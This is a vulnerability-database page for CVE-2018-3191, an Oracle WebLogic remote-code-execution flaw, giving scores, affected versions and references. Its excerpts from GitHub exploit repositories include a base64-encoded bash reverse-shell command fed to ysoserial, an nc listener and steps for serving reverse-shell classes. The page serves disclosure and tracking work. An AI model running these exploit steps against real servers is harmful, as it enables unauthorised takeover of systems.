Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9.8
CVSSv3

CVE-2018-3191

Published: 17/10/2018 Updated: 03/10/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 670
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Subscribe to Weblogic Server

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

oracle weblogic server 12.2.1.3.0

oracle weblogic server 12.1.3.0.0

oracle weblogic server 10.3.6.0.0

Github Repositories

https://github.com/arongmh/CVE-2018-3191

CVE-2018-3191 payload generator

CVE-2018-3191 payload generator Download: githubcom/voidfyoo/CVE-2018-3191/releases Usage java -jar weblogic-spring-jndijar <jndi_address> eg: java -jar weblogic-spring-jndijar rmi://19216811:1099/Exp Notes weblogic-spring-jndi-12213jar for weblogic: 12213 webl

https://github.com/TSY244/CyberspaceSearchEngine

api info path: /search/info? example:127001:8000/search/info?site=19216879128&ports=1,2,3 参数 参数类型 描述 例子 site str 站点ip 127001:8000/search/info?site=19216879128 porta list 开放的端口,支持多个参数以逗号隔开 127001:8000/search/info?ports=1,2,3 tide list 指纹 127001:8000/sear

https://github.com/mackleadmire/CVE-2018-3191-Rce-Exploit

CVE-2018-3191-Rce-Exploit Author: Break Step 1: java -jar GenPayloadjava output SJpayloadbin, Address is RMI Server address Step 2:java -jar RMISERVERjar httpaddress, RMI server listening on port 1099 and load remote Reverse classes on web server Step 3:put two files(reverse shell) LoadObjectclass and StreamConnectionclass on http server and can be visited by url Step 4:

https://github.com/Libraggbond/CVE-2018-3191

CVE-2018-3191 反弹shell

CVE-2018-3191 CVE-2018-3191 反弹shell 本地ip:17216381 Weblogic:1721638174:7001 1、 本地执行 java -cp ysoserial-masterjar ysoserialexploitJRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}' 然后执行 nc -lvv 7777 (1) 其中的 bash 命令为避免RuntimegetRu

https://github.com/jas502n/CVE-2018-3191

Weblogic-CVE-2018-3191远程代码命令执行漏洞

Weblogic-CVE-2018-3191远程代码命令执行漏洞 weblogic For Docker 环境 0x00 简介 北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(Critical Patch Update)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。 该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Se

References

NVD-CWE-noinfohttp://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.htmlhttp://www.securitytracker.com/id/1041896http://www.securityfocus.com/bid/105613https://nvd.nist.govhttps://github.com/arongmh/CVE-2018-3191
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-32744privilege escalationCVE-2024-30253CVE-2024-3914cross-site scriptingCVE-2024-31497CVE-2024-3400CVE-2024-32341hardcoded
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook